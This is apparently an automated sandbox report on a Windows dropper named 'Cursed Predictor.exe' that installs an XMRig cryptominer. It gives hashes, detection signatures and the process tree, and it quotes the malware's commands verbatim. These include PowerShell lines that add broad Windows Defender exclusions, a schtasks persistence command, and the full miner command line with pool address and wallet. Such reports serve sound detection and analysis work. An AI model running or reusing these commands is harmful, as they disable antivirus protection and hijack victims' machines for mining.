Analysis
-
max time kernel
49s -
max time network
50s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-11-2024 22:06
Static task
static1
General
-
Target
Cursed Predictor.exe
-
Size
2.2MB
-
MD5
4bac19442ed88bfcdca107b18824bfd4
-
SHA1
880fb3e65ae6eb75a7c868da907ae9f6dc7a844b
-
SHA256
bb84703780bd730fe535d2c07382c46b15be3ecd61cc0480bba49390fbe8ac8a
-
SHA512
7f242b259aff40ceac205d2bd9bb8ab05c4d381e432684b9f04dffa2b39e43fb928fa114ab1ab0b431654119694afa60261b50e28ad843e6662bb0ea2c64fd9a
-
SSDEEP
49152:dArx5TeQSNLnz2qOkubr6iAeDP1MU1ya4ErLo:qVEQSNXOjAeiU1yDErM
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 21 IoCs
Processes:
resource yara_rule behavioral1/memory/1428-56-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-60-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-79-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-77-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-74-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-72-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-70-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-68-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-66-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-81-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-58-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-54-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-83-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-84-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-82-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-87-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-86-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-88-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-89-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1428-90-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 2688 powershell.exe 2616 powershell.exe 1868 powershell.exe 2440 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
services64.exesihost64.exepid Process 2604 services64.exe 380 sihost64.exe -
Loads dropped DLL 2 IoCs
Processes:
cmd.execonhost.exepid Process 2776 cmd.exe 2680 conhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 8 IoCs
Processes:
conhost.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.exedescription ioc Process File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid Process procid_target PID 2680 set thread context of 1428 2680 conhost.exe 49 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exeexplorer.exepid Process 1604 conhost.exe 2688 powershell.exe 2616 powershell.exe 2680 conhost.exe 2680 conhost.exe 1868 powershell.exe 2440 powershell.exe 1428 explorer.exe 1428 explorer.exe 1428 explorer.exe 1428 explorer.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exeexplorer.exedescription pid Process Token: SeDebugPrivilege 1604 conhost.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe Token: SeDebugPrivilege 2680 conhost.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeLockMemoryPrivilege 1428 explorer.exe Token: SeLockMemoryPrivilege 1428 explorer.exe -
Suspicious use of WriteProcessMemory 61 IoCs
Processes:
Cursed Predictor.execonhost.execmd.execmd.execmd.exeservices64.execonhost.execmd.exesihost64.exedescription pid Process procid_target PID 2136 wrote to memory of 1604 2136 Cursed Predictor.exe 31 PID 2136 wrote to memory of 1604 2136 Cursed Predictor.exe 31 PID 2136 wrote to memory of 1604 2136 Cursed Predictor.exe 31 PID 2136 wrote to memory of 1604 2136 Cursed Predictor.exe 31 PID 1604 wrote to memory of 2372 1604 conhost.exe 32 PID 1604 wrote to memory of 2372 1604 conhost.exe 32 PID 1604 wrote to memory of 2372 1604 conhost.exe 32 PID 2372 wrote to memory of 2688 2372 cmd.exe 34 PID 2372 wrote to memory of 2688 2372 cmd.exe 34 PID 2372 wrote to memory of 2688 2372 cmd.exe 34 PID 1604 wrote to memory of 2828 1604 conhost.exe 36 PID 1604 wrote to memory of 2828 1604 conhost.exe 36 PID 1604 wrote to memory of 2828 1604 conhost.exe 36 PID 2828 wrote to memory of 2936 2828 cmd.exe 38 PID 2828 wrote to memory of 2936 2828 cmd.exe 38 PID 2828 wrote to memory of 2936 2828 cmd.exe 38 PID 2372 wrote to memory of 2616 2372 cmd.exe 39 PID 2372 wrote to memory of 2616 2372 cmd.exe 39 PID 2372 wrote to memory of 2616 2372 cmd.exe 39 PID 1604 wrote to memory of 2776 1604 conhost.exe 40 PID 1604 wrote to memory of 2776 1604 conhost.exe 40 PID 1604 wrote to memory of 2776 1604 conhost.exe 40 PID 2776 wrote to memory of 2604 2776 cmd.exe 42 PID 2776 wrote to memory of 2604 2776 cmd.exe 42 PID 2776 wrote to memory of 2604 2776 cmd.exe 42 PID 2604 wrote to memory of 2680 2604 services64.exe 43 PID 2604 wrote to memory of 2680 2604 services64.exe 43 PID 2604 wrote to memory of 2680 2604 services64.exe 43 PID 2604 wrote to memory of 2680 2604 services64.exe 43 PID 2680 wrote to memory of 2876 2680 conhost.exe 44 PID 2680 wrote to memory of 2876 2680 conhost.exe 44 PID 2680 wrote to memory of 2876 2680 conhost.exe 44 PID 2876 wrote to memory of 1868 2876 cmd.exe 46 PID 2876 wrote to memory of 1868 2876 cmd.exe 46 PID 2876 wrote to memory of 1868 2876 cmd.exe 46 PID 2680 wrote to memory of 380 2680 conhost.exe 47 PID 2680 wrote to memory of 380 2680 conhost.exe 47 PID 2680 wrote to memory of 380 2680 conhost.exe 47 PID 2876 wrote to memory of 2440 2876 cmd.exe 48 PID 2876 wrote to memory of 2440 2876 cmd.exe 48 PID 2876 wrote to memory of 2440 2876 cmd.exe 48 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 2680 wrote to memory of 1428 2680 conhost.exe 49 PID 380 wrote to memory of 2488 380 sihost64.exe 50 PID 380 wrote to memory of 2488 380 sihost64.exe 50 PID 380 wrote to memory of 2488 380 sihost64.exe 50 PID 380 wrote to memory of 2488 380 sihost64.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cursed Predictor.exe"C:\Users\Admin\AppData\Local\Temp\Cursed Predictor.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Cursed Predictor.exe"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2936
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:2488
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43rA5toUxGRPdH1pZEu5rta2kg6aScfCo1mT6sADHRhaUyrCkYaP8co8VEfpnehJ3MPZh3NZP51k9PoxQHmXrGTLEdgLLC2 --pass=xcursed --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6PM1bM12qQ/jBINVCkM1WItos3kjEjKfK1MBGf2BfB4Q" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-stealth6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5df2c768d80e166bc6527fa26d142393e
SHA1f084c9b6c3d728fdb6fa982d023c7b3896438521
SHA256dfd5d6cd3c24af0dd63cdbd960f43a22fe3a777b502c0588db965c2bd228ad5a
SHA512e2d780e016e2d9f107102b48c72e846d3c727d74f58e7eb4450dfc2b78d9a54d87cc8546672cd30b8360f1965c6ecc508b6db06d57e5acf60e37ccec7a1f04be
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD568053aeb178e1b4a88fa962dc5b1bf09
SHA1dff814c57949a34f873872f6dd47e04f04851a88
SHA256530e11da0a7d4d846d672b3562464f069b73e9cd3029d7d6bf504e350f7035ab
SHA512bbc636b9be6720ad0cddf7130eb1a94aaf1967e97f47b0363dcc293280dce22b81138a657f98014f28ce3ebd8b737de12c11407ebbc9751c2c43e2402b5107de
-
Filesize
32KB
MD51c6a9e52eef2c0ac918fd3d41faee943
SHA15c058a57fdcc376689cc0bb72af149dab5073112
SHA256629d3012d5285e9fc5cfea08be02c13ef52051d504b4c75b06f6fa6a9dba06c2
SHA5125607aaaf2d5877ae5f38064e165e2dbfcedb6a7bf645d63c3092e3527c592ac78d82602870f9dff2e79720999ccc508a2c525c6486cef09dcefa1391c82b9a05
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2.2MB
MD54bac19442ed88bfcdca107b18824bfd4
SHA1880fb3e65ae6eb75a7c868da907ae9f6dc7a844b
SHA256bb84703780bd730fe535d2c07382c46b15be3ecd61cc0480bba49390fbe8ac8a
SHA5127f242b259aff40ceac205d2bd9bb8ab05c4d381e432684b9f04dffa2b39e43fb928fa114ab1ab0b431654119694afa60261b50e28ad843e6662bb0ea2c64fd9a